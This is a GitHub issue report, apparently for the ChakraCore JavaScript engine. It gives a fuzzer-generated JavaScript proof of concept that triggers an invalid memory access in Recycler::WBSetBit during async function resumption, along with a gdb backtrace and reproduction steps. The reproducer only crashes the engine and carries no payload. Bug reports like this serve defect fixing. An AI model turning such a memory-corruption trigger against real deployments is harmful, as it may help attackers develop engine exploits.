Invalid Memory Access in WBSetBit #6699

Closed
xuelanxu opened this issue Apr 12, 2021 · 0 comments · Fixed by #6700


@xuelanxu

PoC:

// Reproducer for #6699 (fixed by #6700): the engine crashes in
// Memory::Recycler::WBSetBit while resuming the async function v10
// (see the gdb backtrace below: EntryReactionTaskFunction -> AsyncSpawnStep
// -> CallGenerator -> WBSetBit).
// Fuzzer-style test case: the exact object shapes, literal values and
// statement order are part of the trigger, so do not simplify or restyle.
function main() {
// Async arrow with a rest parameter; only referenced as the `call` property of v9.
const v2 = async (v3,v4,...v5) => {
};
// Plain object awaited in the loop. It has no `then` property, so `await v9`
// presumably just yields to the microtask queue and evaluates to v9 — confirm.
const v9 = {call:v2,has:eval};
async function v10(v11,v12,v13,v14) {
    // 257 iterations: each one allocates fresh arrays/objects and then
    // suspends at `await`, so the generator is resumed many times.
    for (let v17 = 0; v17 < 257; v17++) {
        const v22 = [13.37,13.37,13.37,4294967296,13.37];
        const v23 = [13.37];
        const v24 = ["s2cshfCfBy"];
        // Object whose prototype is an array literal, with an out-of-range
        // `length`, and the function's `arguments` object as its toString.
        const v25 = {__proto__:v24,a:"-4294967297",d:v24,e:v22,length:4294967296,toString:arguments,valueOf:v23};
        const v26 = await v9;
    }
    const v30 = [257,0,10,9007199254740992];
}
// The returned promise is never awaited: v10 runs synchronously up to its
// first `await` here, and the remaining steps run from the promise reaction
// queue (the frames above WBSetBit in the backtrace).
const v31 = v10();
}
main();

Backtrace:

(gdb) bt
#0  0x00007fd77b8014ef in ?? ()
#1  0x00000ffaef74fc61 in ?? ()
#2  0x00007fd77ba865d0 in ?? ()
#3  0x00000ffaef75cd0f in ?? ()
#4  0x00007fd77bae6870 in ?? ()
#5  0x00007fd77b801000 in ?? ()
#6  0x00007fd77b837000 in ?? ()
#7  0x00007fffb6663260 in ?? ()
#8  0x000055d8df6fd899 in Memory::Recycler::WBSetBit (addr=0x7fd77ba8a000 "") at /src/chakracore/lib/Common/Memory/Recycler.cpp:9227
#9  0x000055d8e19176ae in amd64_CallFunction () at /src/chakracore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
#10 0x000055d8e0e74f98 in Js::JavascriptGenerator::CallGenerator (this=<optimized out>, data=<optimized out>, resumeKind=<optimized out>) at /src/chakracore/lib/Runtime/Library/JavascriptGenerator.cpp:185
#11 0x000055d8e0de62d9 in Js::JavascriptAsyncFunction::AsyncSpawnStep (stepFunction=0x7fd778b3b690, generator=0x7fd77ba83060, resolve=0x7fd77baa3300, reject=0x7fd77baa3360) at /src/chakracore/lib/Runtime/Library/JavascriptAsyncFunction.cpp:151
#12 0x000055d8e0de8a68 in Js::JavascriptAsyncFunction::EntryAsyncSpawnCallStepFunction (function=<optimized out>, callInfo=...) at /src/chakracore/lib/Runtime/Library/JavascriptAsyncFunction.cpp:130
#13 0x000055d8e15bf2f6 in Js::JavascriptPromise::EntryReactionTaskFunction (function=<optimized out>, callInfo=...) at /src/chakracore/lib/Runtime/Library/JavascriptPromise.cpp:1074
#14 0x000055d8e19176ae in amd64_CallFunction () at /src/chakracore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
#15 0x000055d8e0e51f37 in Js::JavascriptFunction::CallRootFunctionInternal (obj=<optimized out>, args=..., scriptContext=<optimized out>, inScript=<optimized out>) at /src/chakracore/lib/Runtime/Library/JavascriptFunction.cpp:772
#16 0x000055d8e0e516ed in Js::JavascriptFunction::CallRootFunction (obj=<optimized out>, scriptContext=<optimized out>, inScript=true, args=...) at /src/chakracore/lib/Runtime/Library/JavascriptFunction.cpp:717
#17 Js::JavascriptFunction::CallRootFunction (this=<optimized out>, args=..., scriptContext=<optimized out>, inScript=<optimized out>) at /src/chakracore/lib/Runtime/Library/JavascriptFunction.cpp:832
#18 0x000055d8df20d7c8 in JsCallFunction::$_67::operator() (_actionEntryPopper=..., this=<optimized out>, scriptContext=<optimized out>) at /src/chakracore/lib/Jsrt/Jsrt.cpp:2842
#19 _JsErrorCode ContextAPIWrapper<false, JsCallFunction::$_67>(JsCallFunction::$_67)::{lambda(Js::ScriptContext*)#1}::operator()(Js::ScriptContext*) const (this=<optimized out>, scriptContext=<optimized out>) at /src/chakracore/lib/Jsrt/JsrtInternal.h:237
#20 ContextAPIWrapper_Core<false, _JsErrorCode ContextAPIWrapper<false, JsCallFunction::$_67>(JsCallFunction::$_67)::{lambda(Js::ScriptContext*)#1}>(_JsErrorCode ContextAPIWrapper<false, JsCallFunction::$_67>(JsCallFunction::$_67)::{lambda(Js::ScriptContext*)#1}) (fn=...) at /src/chakracore/lib/Jsrt/JsrtInternal.h:192
#21 ContextAPIWrapper<false, JsCallFunction::$_67> (fn=...) at /src/chakracore/lib/Jsrt/JsrtInternal.h:235
#22 JsCallFunction (function=0x7fd778b38870, args=0x7fffb6663da0, cargs=1, result=0x7fffb6663dc0) at /src/chakracore/lib/Jsrt/Jsrt.cpp:2804
#23 0x000055d8df014282 in ChakraRTInterface::JsCallFunction (function=0x7fd778b38870, arguments=<optimized out>, argumentCount=1, result=0x7fffb6663dc0) at /src/chakracore/bin/ch/ChakraRtInterface.h:416
#24 WScriptJsrt::CallbackMessage::CallFunction (this=0x7fffb6663dc0, fileName=<optimized out>) at /src/chakracore/bin/ch/WScriptJsrt.cpp:1993
#25 0x000055d8defe692e in MessageQueue::ProcessAll (this=<optimized out>, fileName=<optimized out>) at /src/chakracore/bin/ch/MessageQueue.h:256
#26 RunScript (fileName=0x6040000006d0 "WBSetBit.js",
    fileContents=0x616000000380 "function main() {\nconst v2 = async (v3,v4,...v5) => {\n};\nconst v9 = {call:v2,has:eval};\nasync function v10(v11,v12,v13,v14) {\n    for (let v17 = 0; v17 < 257; v17++) {\n        const v22 = [13.37,13.37"...,
    fileLength=140736253542352, fileContentsFinalizeCallback=0x55d8defffed0 <WScriptJsrt::FinalizeFree(void*)>, bufferValue=0x0, fullPath=<optimized out>, parserStateCache=<optimized out>) at /src/chakracore/bin/ch/ch.cpp:605
#27 0x000055d8defeab65 in ExecuteTest (fileName=0x6040000006d0 "WBSetBit.js") at /src/chakracore/bin/ch/ch.cpp:1152
#28 0x000055d8defec029 in ExecuteTestWithMemoryCheck (fileName=0x55d8e4e58660 "") at /src/chakracore/bin/ch/ch.cpp:1203
#29 main (argc=<optimized out>, c_argv=<optimized out>) at /src/chakracore/bin/ch/ch.cpp:1538

How to reproduce it:

- ./build.sh -d -j
- ch poc.js